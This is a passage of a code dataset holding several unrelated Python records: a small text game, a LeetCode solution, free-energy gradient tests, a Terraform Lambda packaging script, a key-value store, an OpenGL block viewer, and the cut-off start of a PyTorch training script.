introduccion()\n \n NumCaverna = CambiarCueva()\n \n cheqcueva(NumCaverna)\n \n print (\"Quieres jugar de nuevo? (si o no)\")\n EmpezarNuevo = input()\n\n ","sub_path":"Historia/Dragon.py","file_name":"Dragon.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"510980926","text":"\"\"\"\nGiven a string s consists of upper/lower-case alphabets and empty space characters ' ', return the length of last word in the string.\n\nIf the last word does not exist, return 0.\n\nNote: A word is defined as a character sequence consists of non-space characters only.\n\nExample:\n\nInput: \"Hello World\"\nOutput: 5\n\"\"\"\n\nclass Solution(object):\n def lengthOfLastWord(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n\n inword = False\n lastword = 0\n x = 0\n\n for i in range(0, len(s)):\n if s[i] != ' ':\n inword = True\n x += 1\n elif inword == True:\n lastword = x\n inword = False\n x = 0\n \n if x == 0:\n return lastword\n else:\n return x \n\n\n\ns = Solution()\nsol = s.lengthOfLastWord(\"abec \")\nif sol != None:\n print (\"The last word length is {}\".format(sol))","sub_path":"Easy/length_of_last_word.py","file_name":"length_of_last_word.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"474215433","text":"from jax.config import config; config.update(\"jax_enable_x64\", True)\nimport jax\nimport numpy as np\nimport jax.numpy as jnp\nfrom jax.scipy.special import logsumexp\nimport pymbar\nfrom fe import bar\nimport unittest\n\ndef finite_difference_bar(w, delta):\n fd_pymbar = np.zeros_like(w)\n for i in range(2):\n for j in range(len(w[0])):\n original = pymbar.BAR(w[0],w[1])[0]\n # central difference\n w[i][j] += 0.5*delta\n left_edge = pymbar.BAR(w[0],w[1])[0]\n w[i][j] -= delta\n right_edge = pymbar.BAR(w[0],w[1])[0]\n fd = (left_edge - right_edge)/delta\n fd_pymbar[i][j] = fd\n w[i][j] += 0.5*delta\n return fd_pymbar\n\ndef finite_difference_exp(w, delta):\n fd_exp = np.zeros_like(w)\n for i in range(2):\n for j in range(len(w[0])):\n original = bar.EXP(w)\n # central difference\n w[i][j] += 0.5*delta\n left_edge = bar.EXP(w)\n w[i][j] -= delta\n right_edge = bar.EXP(w)\n fd = (left_edge - right_edge)/delta\n fd_exp[i][j] = fd\n w[i][j] += 0.5*delta\n return fd_exp\n\nclass TestFreeEnergyDerivatives(unittest.TestCase):\n\n def test_bar_gradient(self):\n delta = 1e-6\n w = np.random.rand(2,50)\n np.testing.assert_allclose(\n finite_difference_bar(w, delta),\n bar.dG_dw(w),\n rtol=1e-6\n )\n\n def test_exp_gradient(self):\n delta = 1e-6\n w = np.random.rand(2,50)\n dEXP_dw = jax.grad(bar.EXP,argnums=(0,))\n np.testing.assert_allclose(\n finite_difference_exp(w, delta),\n dEXP_dw(w)[0],\n rtol=1e-6\n )\n\n","sub_path":"tests/test_bar.py","file_name":"test_bar.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"574855687","text":"# coding: utf-8\n\nimport sys\n\nif sys.version_info < (3, 7):\n raise RuntimeError(\"A python version 3.7 or newer is required\")\n\nimport os\nimport time\nimport stat\nimport json\nimport shlex\nimport shutil\nimport hashlib\nimport zipfile\nimport argparse\nimport datetime\nimport tempfile\nimport platform\nimport subprocess\nfrom subprocess import check_call\nfrom contextlib import contextmanager\nfrom base64 import b64encode\nimport logging\n\nPY38 = sys.version_info >= (3, 8)\n\n################################################################################\n# Logging\n\nDEBUG2 = 9\nDEBUG3 = 8\n\nlog_handler = None\nlogger = logging.getLogger()\ncmd_logger = logging.getLogger('cmd')\n\n\ndef configure_logging(use_tf_stderr=False):\n global log_handler\n\n logging.addLevelName(DEBUG2, 'DEBUG2')\n logging.addLevelName(DEBUG3, 'DEBUG3')\n\n class LogFormatter(logging.Formatter):\n default_format = '%(message)s'\n formats = {\n 'root': default_format,\n 'build': default_format,\n 'cmd': '> %(message)s',\n '': '%(name)s: %(message)s'\n }\n\n def formatMessage(self, record):\n self._style._fmt = self.formats.get(record.name, self.formats[''])\n return super().formatMessage(record)\n\n tf_stderr_fd = 5\n log_stream = sys.stderr\n if use_tf_stderr:\n try:\n if os.isatty(tf_stderr_fd):\n log_stream = os.fdopen(tf_stderr_fd, mode='w')\n except OSError:\n pass\n\n log_handler = logging.StreamHandler(stream=log_stream)\n log_handler.setFormatter(LogFormatter())\n\n logger.addHandler(log_handler)\n logger.setLevel(logging.INFO)\n\n\n################################################################################\n# Backports\n\ndef shlex_join(split_command):\n \"\"\"Return a shell-escaped string from *split_command*.\"\"\"\n return ' '.join(shlex.quote(arg) for arg in split_command)\n\n\n################################################################################\n# Common functions\n\ndef abort(message):\n \"\"\"Exits with an error message.\"\"\"\n logger.error(message)\n sys.exit(1)\n\n\n@contextmanager\ndef cd(path, silent=False):\n \"\"\"Changes the working directory.\"\"\"\n cwd = os.getcwd()\n if not silent:\n cmd_logger.info('cd %s', shlex.quote(path))\n try:\n os.chdir(path)\n yield\n finally:\n os.chdir(cwd)\n\n\n@contextmanager\ndef tempdir():\n \"\"\"Creates a temporary directory and then deletes it afterwards.\"\"\"\n prefix = 'terraform-aws-lambda-'\n path = tempfile.mkdtemp(prefix=prefix)\n cmd_logger.info('mktemp -d %sXXXXXXXX # %s', prefix, shlex.quote(path))\n try:\n yield path\n finally:\n shutil.rmtree(path)\n\n\ndef list_files(top_path, logger=None):\n \"\"\"\n Returns a sorted list of all files in a directory.\n \"\"\"\n\n if logger:\n logger = logger.getChild('ls')\n\n results = []\n\n for root, dirs, files in os.walk(top_path):\n for file_name in files:\n file_path = os.path.join(root, file_name)\n relative_path = os.path.relpath(file_path, top_path)\n results.append(relative_path)\n if logger:\n logger.debug(relative_path)\n\n results.sort()\n return results\n\n\ndef dataclass(name, **fields):\n typ = type(name, (object,), {\n '__slots__': fields.keys(),\n '__getattr__': lambda *_: None,\n })\n for k, v in fields.items():\n setattr(typ, k, v)\n return typ\n\n\ndef datatree(name, **fields):\n def decode_json(v):\n if v and isinstance(v, str) and v[0] in '\"[{':\n try:\n return json.loads(v)\n except json.JSONDecodeError:\n pass\n return v\n\n return dataclass(name, **dict(((\n k, datatree(k, **v) if isinstance(v, dict) else decode_json(v))\n for k, v in fields.items())))()\n\n\ndef timestamp_now_ns():\n timestamp = datetime.datetime.now().timestamp()\n timestamp = int(timestamp * 10 ** 7) * 10 ** 2\n return timestamp\n\n\ndef source_code_hash(bytes):\n return b64encode(hashlib.sha256(bytes).digest()).decode()\n\n\ndef yesno_bool(val):\n if val is None:\n return\n if isinstance(val, bool):\n return val\n if isinstance(val, int):\n return bool(val)\n if isinstance(val, str):\n if val.isnumeric():\n return bool(int(val))\n val = val.lower()\n if val in ('true', 'yes', 'y'):\n return True\n elif val in ('false', 'no', 'n'):\n return False\n else:\n raise ValueError(\"Unsupported value: %s\" % val)\n return False\n\n\n################################################################################\n# Packaging functions\n\ndef emit_dir_files(base_dir):\n for root, dirs, files in os.walk(base_dir):\n if root != '.':\n yield os.path.normpath(root)\n for name in files:\n path = os.path.normpath(os.path.join(root, name))\n if os.path.isfile(path):\n yield path\n\n\ndef make_zipfile(zip_filename, *base_dirs, timestamp=None,\n compression=zipfile.ZIP_DEFLATED):\n \"\"\"\n Create a zip file from all the files under 'base_dir'.\n The output zip file will be named 'base_name' + \".zip\". Returns the\n name of the output zip file.\n \"\"\"\n\n # Borrowed from python 3.8 zipfile.py library\n # due to the need of strict_timestamps functionality.\n def from_file(cls, filename, arcname=None, *, strict_timestamps=True):\n \"\"\"Construct an appropriate ZipInfo for a file on the filesystem.\n\n filename should be the path to a file or directory on the filesystem.\n\n arcname is the name which it will have within the archive (by default,\n this will be the same as filename, but without a drive letter and with\n leading path separators removed).\n \"\"\"\n if isinstance(filename, os.PathLike):\n filename = os.fspath(filename)\n st = os.stat(filename)\n isdir = stat.S_ISDIR(st.st_mode)\n mtime = time.localtime(st.st_mtime)\n date_time = mtime[0:6]\n if not strict_timestamps and date_time[0] < 1980:\n date_time = (1980, 1, 1, 0, 0, 0)\n elif not strict_timestamps and date_time[0] > 2107:\n date_time = (2107, 12, 31, 23, 59, 59)\n # Create ZipInfo instance to store file information\n if arcname is None:\n arcname = filename\n arcname = os.path.normpath(os.path.splitdrive(arcname)[1])\n while arcname[0] in (os.sep, os.altsep):\n arcname = arcname[1:]\n if isdir:\n arcname += '/'\n zinfo = cls(arcname, date_time)\n zinfo.external_attr = (st.st_mode & 0xFFFF) << 16 # Unix attributes\n if isdir:\n zinfo.file_size = 0\n zinfo.external_attr |= 0x10 # MS-DOS directory flag\n else:\n zinfo.file_size = st.st_size\n\n return zinfo\n\n # An extended version of a write method\n # from the original zipfile.py library module\n def write(self, filename, arcname=None,\n compress_type=None, compresslevel=None,\n date_time=None):\n \"\"\"Put the bytes from filename into the archive under the name\n arcname.\"\"\"\n if not self.fp:\n raise ValueError(\n \"Attempt to write to ZIP archive that was already closed\")\n if self._writing:\n raise ValueError(\n \"Can't write to ZIP archive while an open writing handle exists\"\n )\n\n if PY38:\n zinfo = zipfile.ZipInfo.from_file(\n filename, arcname, strict_timestamps=self._strict_timestamps)\n else:\n zinfo = from_file(\n zipfile.ZipInfo, filename, arcname, strict_timestamps=True)\n\n if date_time:\n zinfo.date_time = date_time\n\n if zinfo.is_dir():\n zinfo.compress_size = 0\n zinfo.CRC = 0\n else:\n if compress_type is not None:\n zinfo.compress_type = compress_type\n else:\n zinfo.compress_type = self.compression\n\n if compresslevel is not None:\n zinfo._compresslevel = compresslevel\n else:\n zinfo._compresslevel = self.compresslevel\n\n if zinfo.is_dir():\n with self._lock:\n if self._seekable:\n self.fp.seek(self.start_dir)\n zinfo.header_offset = self.fp.tell() # Start of header bytes\n if zinfo.compress_type == zipfile.ZIP_LZMA:\n # Compressed data includes an end-of-stream (EOS) marker\n zinfo.flag_bits |= 0x02\n\n self._writecheck(zinfo)\n self._didModify = True\n\n self.filelist.append(zinfo)\n self.NameToInfo[zinfo.filename] = zinfo\n self.fp.write(zinfo.FileHeader(False))\n self.start_dir = self.fp.tell()\n else:\n with open(filename, \"rb\") as src, self.open(zinfo, 'w') as dest:\n shutil.copyfileobj(src, dest, 1024 * 8)\n\n def str_int_to_timestamp(s):\n min_zip_ts = datetime.datetime(1980, 1, 1).timestamp()\n ts = int(s)\n if ts < min_zip_ts:\n return min_zip_ts\n deg = len(str(int(s))) - 9\n if deg < 0:\n ts = ts * 10 ** deg\n return ts\n\n logger = logging.getLogger('zip')\n\n date_time = None\n if timestamp is not None:\n if isinstance(timestamp, str):\n if timestamp.isnumeric():\n timestamp = str_int_to_timestamp(timestamp)\n else:\n timestamp = float(timestamp)\n elif isinstance(timestamp, int):\n timestamp = str_int_to_timestamp(str(timestamp))\n\n date_time = datetime.datetime.fromtimestamp(timestamp).timetuple()[:6]\n if date_time[0] < 1980:\n raise ValueError('ZIP does not support timestamps before 1980')\n\n archive_dir = os.path.dirname(zip_filename)\n\n if archive_dir and not os.path.exists(archive_dir):\n logger.info(\"creating %s\", archive_dir)\n os.makedirs(archive_dir)\n\n logger.info(\"creating '%s' archive\", zip_filename)\n\n tmp_zip_filename = '{}.tmp'.format(zip_filename)\n try:\n with zipfile.ZipFile(tmp_zip_filename, \"w\", compression) as zf:\n for base_dir in base_dirs:\n logger.info(\"adding content of directory '%s'\", base_dir)\n with cd(base_dir, silent=True):\n for path in emit_dir_files('.'):\n logger.info(\"adding '%s'\", path)\n write(zf, path, path, date_time=date_time)\n except Exception:\n os.unlink(tmp_zip_filename)\n else:\n os.replace(tmp_zip_filename, zip_filename)\n return zip_filename\n\n\n################################################################################\n# Docker building\n\ndef docker_build_command(build_root, docker_file=None, tag=None):\n \"\"\"\"\"\"\n docker_cmd = ['docker', 'build']\n if docker_file:\n docker_cmd.extend(['--file', docker_file])\n if tag:\n docker_cmd.extend(['--tag', tag])\n docker_cmd.append(build_root)\n\n cmd_logger.info(shlex_join(docker_cmd))\n log_handler and log_handler.flush()\n return docker_cmd\n\n\ndef docker_run_command(build_root, command, runtime,\n image=None, shell=None, interactive=False,\n pip_cache_dir=None):\n \"\"\"\"\"\"\n docker_cmd = ['docker', 'run', '--rm']\n\n if interactive:\n docker_cmd.append('-it')\n\n bind_path = os.path.abspath(build_root)\n docker_cmd.extend(['-v', \"{}:/var/task:z\".format(bind_path)])\n\n home = os.environ['HOME']\n docker_cmd.extend([\n # '-v', '{}/.ssh/id_rsa:/root/.ssh/id_rsa:z'.format(home),\n '-v', '{}/.ssh/known_hosts:/root/.ssh/known_hosts:z'.format(home),\n ])\n\n if platform.system() == 'Darwin':\n # https://docs.docker.com/docker-for-mac/osxfs/#ssh-agent-forwarding\n docker_cmd.extend([\n '--mount', 'type=bind,'\n 'src=/run/host-services/ssh-auth.sock,'\n 'target=/run/host-services/ssh-auth.sock',\n '-e', 'SSH_AUTH_SOCK=/run/host-services/ssh-auth.sock',\n ])\n elif platform.system() == 'Linux':\n sock = os.environ['SSH_AUTH_SOCK'] # TODO: Handle missing env var\n docker_cmd.extend([\n '-v', '{}:/tmp/ssh_sock:z'.format(sock),\n '-e', 'SSH_AUTH_SOCK=/tmp/ssh_sock',\n ])\n if pip_cache_dir:\n pip_cache_dir = os.path.abspath(pip_cache_dir)\n docker_cmd.extend([\n '-v', '{}:/root/.cache/pip:z'.format(pip_cache_dir),\n ])\n else:\n raise RuntimeError(\"Unsupported platform for docker building\")\n\n if not image:\n image = 'lambci/lambda:build-{}'.format(runtime)\n\n docker_cmd.append(image)\n\n assert isinstance(command, list)\n if shell:\n if not isinstance(shell, str):\n shell = '/bin/sh'\n docker_cmd.extend([shell, '-c'])\n docker_cmd.extend(command)\n\n cmd_logger.info(shlex_join(docker_cmd))\n log_handler and log_handler.flush()\n return docker_cmd\n\n\n################################################################################\n# Commands\n\ndef prepare_command(args):\n \"\"\"\n Generates a content hash of the source_path, which is used to determine if\n the Lambda code has changed, ignoring file modification and access times.\n\n Outputs a filename and a command to run if the archive needs to be built.\n \"\"\"\n\n logger = logging.getLogger('prepare')\n\n def generate_content_hash(source_paths,\n hash_func=hashlib.sha256, logger=None):\n \"\"\"\n Generate a content hash of the source paths.\n \"\"\"\n\n if logger:\n logger = logger.getChild('hash')\n\n hash_obj = hash_func()\n\n for source_path in source_paths:\n if os.path.isdir(source_path):\n source_dir = source_path\n for source_file in list_files(source_dir):\n update_hash(hash_obj, source_dir, source_file)\n if logger:\n logger.debug(os.path.join(source_dir, source_file))\n else:\n source_dir = os.path.dirname(source_path)\n source_file = os.path.relpath(source_path, source_dir)\n update_hash(hash_obj, source_dir, source_file)\n if logger:\n logger.debug(source_path)\n\n return hash_obj\n\n def update_hash(hash_obj, file_root, file_path):\n \"\"\"\n Update a hashlib object with the relative path and contents of a file.\n \"\"\"\n\n relative_path = os.path.join(file_root, file_path)\n hash_obj.update(relative_path.encode())\n\n with open(relative_path, 'rb') as open_file:\n while True:\n data = open_file.read(1024 * 8)\n if not data:\n break\n hash_obj.update(data)\n\n # Load the query.\n query_data = json.load(sys.stdin)\n\n if logger.isEnabledFor(DEBUG3):\n logger.debug('ENV: %s', json.dumps(dict(os.environ), indent=2))\n if logger.isEnabledFor(DEBUG2):\n logger.debug('QUERY: %s', json.dumps(query_data, indent=2))\n\n query = datatree('prepare_query', **query_data)\n\n tf_paths = query.paths\n runtime = query.runtime\n function_name = query.function_name\n artifacts_dir = query.artifacts_dir\n hash_extra_paths = query.hash_extra_paths\n source_path = query.source_path\n hash_extra = query.hash_extra\n recreate_missing_package = yesno_bool(args.recreate_missing_package)\n\n # Compacting docker vars\n docker = query.docker\n if docker:\n docker = {k: v for k, v in docker.items() if v} or True\n\n # Validate the query.\n if not os.path.exists(source_path):\n abort('source_path must be set.')\n\n # Expand a Terraform path. references\n hash_extra_paths = [p.format(path=tf_paths) for p in hash_extra_paths]\n content_hash_paths = [source_path] + hash_extra_paths\n\n # Generate a hash based on file names and content. Also use the\n # runtime value, build command, and content of the build paths\n # because they can have an effect on the resulting archive.\n logger.debug(\"Computing content hash on files...\")\n content_hash = generate_content_hash(content_hash_paths, logger=logger)\n content_hash.update(runtime.encode())\n content_hash.update(hash_extra.encode())\n content_hash = content_hash.hexdigest()\n\n # Generate a unique filename based on the hash.\n filename = os.path.join(artifacts_dir, '{}.zip'.format(content_hash))\n\n # Compute timestamp trigger\n was_missing = False\n filename_path = os.path.join(os.getcwd(), filename)\n if recreate_missing_package:\n if os.path.exists(filename_path):\n st = os.stat(filename_path)\n timestamp = st.st_mtime_ns\n else:\n timestamp = timestamp_now_ns()\n was_missing = True\n else:\n timestamp = \"\"\n\n # Replace variables in the build command with calculated values.\n build_data = {\n 'filename': filename,\n 'runtime': runtime,\n 'source_path': source_path,\n 'artifacts_dir': artifacts_dir,\n }\n if docker:\n build_data['docker'] = docker\n\n build_plan = json.dumps(build_data)\n build_plan_filename = os.path.join(artifacts_dir,\n '{}.plan.json'.format(content_hash))\n if not os.path.exists(artifacts_dir):\n os.makedirs(artifacts_dir)\n with open(build_plan_filename, 'w') as f:\n f.write(build_plan)\n\n # Output the result to Terraform.\n json.dump({\n 'filename': filename,\n 'build_plan': build_plan,\n 'build_plan_filename': build_plan_filename,\n 'timestamp': str(timestamp),\n 'was_missing': 'true' if was_missing else 'false',\n }, sys.stdout, indent=2)\n sys.stdout.write('\\n')\n\n\ndef build_command(args):\n \"\"\"\n Builds a zip file from the source_dir or source_file.\n Installs dependencies with pip automatically.\n \"\"\"\n\n logger = logging.getLogger('build')\n\n def create_zip_file(source_dir, target_file, timestamp):\n \"\"\"\n Creates a zip file from a directory.\n \"\"\"\n\n target_dir = os.path.dirname(target_file)\n if not os.path.exists(target_dir):\n os.makedirs(target_dir)\n make_zipfile(target_file, source_dir, timestamp=timestamp)\n\n if logger.isEnabledFor(DEBUG3):\n logger.debug('ENV: %s', json.dumps(dict(os.environ), indent=2))\n if logger.isEnabledFor(DEBUG2):\n logger.debug('CMD: python3 %s', shlex_join(sys.argv))\n\n with open(args.build_plan_file) as f:\n query_data = json.load(f)\n query = datatree('build_query', **query_data)\n\n runtime = query.runtime\n filename = query.filename\n source_path = query.source_path\n\n timestamp = args.zip_file_timestamp\n artifacts_dir = query.artifacts_dir\n docker = query.docker\n\n if timestamp.isnumeric():\n timestamp = int(timestamp)\n else:\n timestamp = 0\n\n if os.path.exists(filename) and not args.force:\n logger.info('Reused: %s', shlex.quote(filename))\n return\n\n working_dir = os.getcwd()\n\n # Create a temporary directory for building the archive,\n # so no changes will be made to the source directory.\n with tempdir() as temp_dir:\n # Find all source files.\n if os.path.isdir(source_path):\n source_dir = source_path\n source_files = list_files(source_path, logger=logger)\n else:\n source_dir = os.path.dirname(source_path)\n source_files = [os.path.basename(source_path)]\n\n # Copy them into the temporary directory.\n with cd(source_dir):\n for file_name in source_files:\n target_path = os.path.join(temp_dir, file_name)\n target_dir = os.path.dirname(target_path)\n if not os.path.exists(target_dir):\n cmd_logger.info('mkdir -p %s', shlex.quote(target_dir))\n os.makedirs(target_dir)\n cmd_logger.info('cp -t %s %s',\n shlex.quote(target_dir),\n shlex.quote(file_name))\n shutil.copyfile(file_name, target_path)\n shutil.copymode(file_name, target_path)\n shutil.copystat(file_name, target_path)\n\n # Install dependencies into the temporary directory.\n if runtime.startswith('python'):\n requirements = os.path.join(temp_dir, 'requirements.txt')\n if os.path.exists(requirements):\n with cd(temp_dir):\n if runtime.startswith('python3'):\n pip_command = ['pip3']\n else:\n pip_command = ['pip2']\n pip_command.extend([\n 'install', '--no-compile',\n '--prefix=', '--target=.',\n '--requirement=requirements.txt',\n ])\n if docker:\n pip_cache_dir = docker.docker_pip_cache\n if pip_cache_dir:\n if isinstance(pip_cache_dir, str):\n pip_cache_dir = os.path.abspath(\n os.path.join(working_dir, pip_cache_dir))\n else:\n pip_cache_dir = os.path.abspath(os.path.join(\n working_dir, artifacts_dir, 'cache/pip'))\n\n chown_mask = '{}:{}'.format(os.getuid(), os.getgid())\n shell_command = [shlex_join(pip_command), '&&',\n shlex_join(['chown', '-R',\n chown_mask, '.'])]\n shell_command = [' '.join(shell_command)]\n check_call(docker_run_command(\n '.', shell_command, runtime, shell=True,\n pip_cache_dir=pip_cache_dir\n ))\n else:\n cmd_logger.info(shlex_join(pip_command))\n log_handler and log_handler.flush()\n check_call(pip_command)\n\n # Zip up the temporary directory and write it to the target filename.\n # This will be used by the Lambda function as the source code package.\n create_zip_file(temp_dir, filename, timestamp=0)\n os.utime(filename, ns=(timestamp, timestamp))\n logger.info('Created: %s', shlex.quote(filename))\n if logger.isEnabledFor(logging.DEBUG):\n with open(filename, 'rb') as f:\n logger.info('Base64sha256: %s', source_code_hash(f.read()))\n\n\ndef add_hidden_commands(sub_parsers):\n sp = sub_parsers\n\n def hidden_parser(name, **kwargs):\n p = sp.add_parser(name, **kwargs)\n sp._choices_actions.pop() # XXX: help=argparse.SUPPRESS - doesn't work\n return p\n\n p = hidden_parser('docker', help='Run docker build')\n p.set_defaults(command=lambda args: subprocess.call(docker_run_command(\n args.build_root, args.docker_command, args.runtime, interactive=True)))\n p.add_argument('build_root', help='A docker build root folder')\n p.add_argument('docker_command', help='A docker container command',\n metavar='command', nargs=argparse.REMAINDER)\n p.add_argument('-r', '--runtime', help='A docker image runtime',\n default='python3.8')\n\n p = hidden_parser('docker-image', help='Run docker build')\n p.set_defaults(command=lambda args: subprocess.call(docker_build_command(\n args.build_root, args.docker_file, args.tag)))\n p.add_argument('-t', '--tag', help='A docker image tag')\n p.add_argument('build_root', help='A docker build root folder')\n p.add_argument('docker_file', help='A docker file path',\n nargs=argparse.OPTIONAL)\n\n def zip_cmd(args):\n if args.verbose:\n logger.setLevel(logging.DEBUG)\n make_zipfile(args.zipfile, *args.dir, timestamp=args.timestamp)\n if logger.isEnabledFor(logging.DEBUG):\n zipinfo = shutil.which('zipinfo')\n if zipinfo:\n logger.debug('-' * 80)\n subprocess.call([zipinfo, args.zipfile])\n logger.debug('-' * 80)\n logger.debug('Source code hash: %s',\n source_code_hash(open(args.zipfile, 'rb').read()))\n\n p = hidden_parser('zip', help='Zip folder with provided files timestamp')\n p.set_defaults(command=zip_cmd)\n p.add_argument('zipfile', help='Path to a zip file')\n p.add_argument('dir', nargs=argparse.ONE_OR_MORE,\n help='Path to a directory for packaging')\n p.add_argument('-t', '--timestamp', type=int,\n help='A timestamp to override for all zip members')\n p.add_argument('-v', '--verbose', action='store_true')\n\n\ndef args_parser():\n ap = argparse.ArgumentParser()\n ap.set_defaults(command=lambda _: ap.print_usage())\n sp = ap.add_subparsers(metavar=\"COMMAND\")\n\n p = sp.add_parser('prepare',\n help='compute a filename hash for a zip archive')\n p.set_defaults(command=prepare_command)\n\n p = sp.add_parser('build',\n help='build and pack to a zip archive')\n p.set_defaults(command=build_command)\n p.add_argument('--force', action='store_true',\n help='Force rebuilding even if a zip artifact exists')\n p.add_argument('-t', '--timestamp',\n dest='zip_file_timestamp', required=True,\n help='A zip file timestamp generated by the prepare command')\n p.add_argument('build_plan_file', metavar='PLAN_FILE',\n help='A build plan file provided by the prepare command')\n add_hidden_commands(sp)\n return ap\n\n\ndef main():\n ns = argparse.Namespace(\n recreate_missing_package=os.environ.get(\n 'TF_RECREATE_MISSING_LAMBDA_PACKAGE', True),\n log_level=os.environ.get('TF_LAMBDA_PACKAGE_LOG_LEVEL', 'INFO'),\n )\n p = args_parser()\n args = p.parse_args(namespace=ns)\n\n if args.command is prepare_command:\n configure_logging(use_tf_stderr=True)\n else:\n configure_logging()\n\n if args.log_level:\n ll = logging._nameToLevel.get(args.log_level)\n if ll and logging._checkLevel(ll):\n logging.root.setLevel(args.log_level)\n\n exit(args.command(args))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":26905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"645980893","text":"\n\nfrom xai.brain.wordbase.nouns._anklet import _ANKLET\n\n#calss header\nclass _ANKLETS(_ANKLET, ):\n\tdef __init__(self,): \n\t\t_ANKLET.__init__(self)\n\t\tself.name = \"ANKLETS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"anklet\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_anklets.py","file_name":"_anklets.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"258730843","text":"import threading\nimport json\n\nlock = threading._RLock()\n\n\nclass Store():\n \"\"\"\n Store is a key-value service\n \"\"\"\n def __init__(self):\n self.state = {}\n self.filename = \"store.txt\"\n\n # Initialize an empty file even if that file already exists\n with open(self.filename, \"w\"):\n pass\n\n def response(self, status, msg=None):\n \"\"\"\n Build a response. Messages will be JSON encoded in Server send_msg.\n\n :param status:\n :param msg:\n :return:\n \"\"\"\n data = {}\n data[\"status\"] = \"success\" if status else \"error\"\n\n if msg:\n data[\"value\"] = msg\n\n return data\n\n def get(self, key):\n \"\"\"\n Returns a value for a key\n\n :param key:\n :return:\n \"\"\"\n try:\n data = self.state[key]\n except KeyError:\n return self.response(False, \"No such key\")\n\n return self.response(True, data)\n\n def set(self, key, value):\n \"\"\"\n Set JSON decoded value for key.\n Also writes the state to disk in JSON format\n\n :param key:\n :param value:\n :return:\n \"\"\"\n try:\n data = json.loads(value)\n except ValueError:\n return self.response(False, \"Value is not a valid JSON\")\n\n with lock:\n self.state[key] = data\n try:\n with open(self.filename, \"w\") as f:\n json.dump(self.state, f)\n except (OSError, IOError) as e:\n return self.response(False, \"Couldn't save state: {}\".format(e))\n\n return self.response(True)\n\n def save(self):\n \"\"\"\n Save state to a file\n\n :return:\n \"\"\"\n with lock:\n with open(self.filename, \"w\") as f:\n json.dump(self.state, f)\n\n def load(self):\n \"\"\"\n Load state from a file\n\n :return:\n \"\"\"\n with lock:\n with open(self.filename, \"r\") as f:\n self.state = json.load(f)\n","sub_path":"store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"56725861","text":"from pointwindow import PointWindow\nimport numpy as np\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GL.ARB.vertex_buffer_object import *\nfrom blockplayer import config\nfrom blockplayer import blockdraw\n\n\n# Window for drawing point cloudsc\nclass BlockWindow(PointWindow):\n\n def __init__(self, *args, **kwargs):\n self.modelmat = np.eye(4)\n self.flag_drawgrid = False\n super(BlockWindow,self).__init__(*args, **kwargs)\n\n def draw_board(self):\n LW,LH = config.LW, config.LH\n glPolygonOffset(1.0,0.2)\n glEnable(GL_POLYGON_OFFSET_FILL)\n\n # Draw the gray table\n if 'bg' in config.__dict__:\n glBegin(GL_QUADS)\n glColor(0.2,0.2,0.2,1)\n for x,y,z in config.bg['boundptsM']:\n glVertex(x,y,z)\n glEnd()\n\n glPushMatrix()\n glMultMatrixf(np.linalg.inv(self.modelmat).transpose())\n glScale(LW,LH,LW)\n\n glEnable(GL_BLEND)\n glBlendFunc(GL_SRC_ALPHA,GL_ONE_MINUS_SRC_ALPHA)\n glPushMatrix()\n glTranslate(*config.bounds[0])\n blockdraw.draw()\n glPopMatrix()\n\n # Draw the shadow blocks (occlusions)\n glDisable(GL_POLYGON_OFFSET_FILL)\n\n # Draw the axes for the model coordinate space\n glLineWidth(3)\n glBegin(GL_LINES)\n glColor3f(1,0,0); glVertex3f(0,0,0); glVertex3f(1,0,0)\n glColor3f(0,1,0); glVertex3f(0,0,0); glVertex3f(0,1,0)\n glColor3f(0,0,1); glVertex3f(0,0,0); glVertex3f(0,0,1)\n glEnd()\n\n # Draw a grid for the model coordinate space\n if self.flag_drawgrid:\n glLineWidth(1)\n glBegin(GL_LINES)\n GR = config.GRIDRAD/2\n glColor3f(1.0,1.0,1.0)\n for j in range(0,1):\n for i in range(-GR,GR+1):\n glVertex(i,j,-GR); glVertex(i,j,GR)\n glVertex(-GR,j,i); glVertex(GR,j,i)\n glEnd()\n glPopMatrix()\n pass\n glLineWidth(1)\n\n def on_draw(self):\n super(BlockWindow,self).set_camera()\n\n glClearColor(*self.clearcolor)\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n glEnable(GL_DEPTH_TEST)\n\n self._wrap('pre_draw')\n\n if not self.modelmat is None:\n self.draw_points()\n self.draw_board()\n\n self._wrap('post_draw')\n","sub_path":"blockplayer/visuals/blockwindow.py","file_name":"blockwindow.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"351350358","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom torch import optim\n\nfrom NeuralNetwork.Loader import CustomLoader\nfrom NeuralNetwork.Model import *\n\n# uncomment if you don't use pycharm\n# from Loader import CustomLoader\n# from Model import *\n\nDEVICE = (\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef load_checkpoint(filepath):\n model = torch.load(filepath)\n # model.load_state_dict(cp['state_dict'])\n for parameter in model.parameters():\n parameter.requires_grad = False\n\n model.eval()\n\n return model\n\n\ndef run(ta_data, tr_data, epochs=100, save_path='arousal.pth', inputs=56):\n train_data_, test_data_, train_label_, test_label_ = train_test_split(tr_data, ta_data, test_size=0.3)\n train_set = CustomLoader(train_data_, test_data_, train_label_, test_label_, 'tr')\n test_set = CustomLoader(train_data_, test_data_, train_label_, test_label_, 'v')\n # if 